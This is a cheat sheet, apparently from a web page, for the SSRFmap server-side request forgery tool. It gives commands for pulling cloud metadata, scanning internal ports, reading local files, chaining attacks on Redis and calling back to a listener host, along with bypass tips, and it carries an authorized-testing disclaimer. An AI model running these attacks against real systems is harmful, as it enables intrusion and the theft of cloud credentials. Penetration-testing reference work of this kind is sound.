SSRFmap Cheat Sheet
SSRF exploitation framework with modules for cloud metadata, port scan, and shell.
Overview
SSRFmap automates Server-Side Request Forgery testing: identifies injectable parameters, probes internal services, and runs modules (AWS/GCP metadata, Redis, port scan) on authorized targets.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
git clone https://github.com/swisskyrepo/SSRFmap.gitcd SSRFmap && pip install -r requirements.txtEssential commands
Basic SSRF on URL parameter
python ssrfmap.py -r request.txt -p urlRequest file from Burp + parameter name
python ssrfmap.py -r request.txt -p destCommon workflows
AWS metadata (IMDS) —
python ssrfmap.py -r request.txt -p url -m awsInternal port scan via SSRF —
python ssrfmap.py -r request.txt -p url -m portscanpython ssrfmap.py -r request.txt -p url -m portscan --ports 22,80,443,6379,8080Read local files (when supported) —
python ssrfmap.py -r request.txt -p url -m readfilesRedis / gopher chains (advanced, in-scope only) —
python ssrfmap.py -r request.txt -p url -m redisPoint parameter to your listener
python ssrfmap.py -r request.txt -p url --lhost 10.10.14.5 --lport 8000Flags reference
-r FILE | HTTP request file (Burp export) |
|---|---|
-p PARAM | Vulnerable parameter |
-m MODULE | Module (aws, portscan, readfiles, redis, etc.) |
--lhost | Listener / callback host |
--lport | Listener port |
--uagent | Custom User-Agent |
--ssl | Force HTTPS |
--level | Crawl / test level (if supported) |
Tips
- Save raw request from Burp where server fetches a URL you control (url, uri, path, dest).
- Test http://127.0.0.1, http://169.254.169.254, and internal hostnames; encoding bypasses often needed (@, DNS rebinding).
- Cloud: check IMDSv2 token requirement before -m aws.
- Pair with Burp Collaborator or interactsh for blind SSRF confirmation.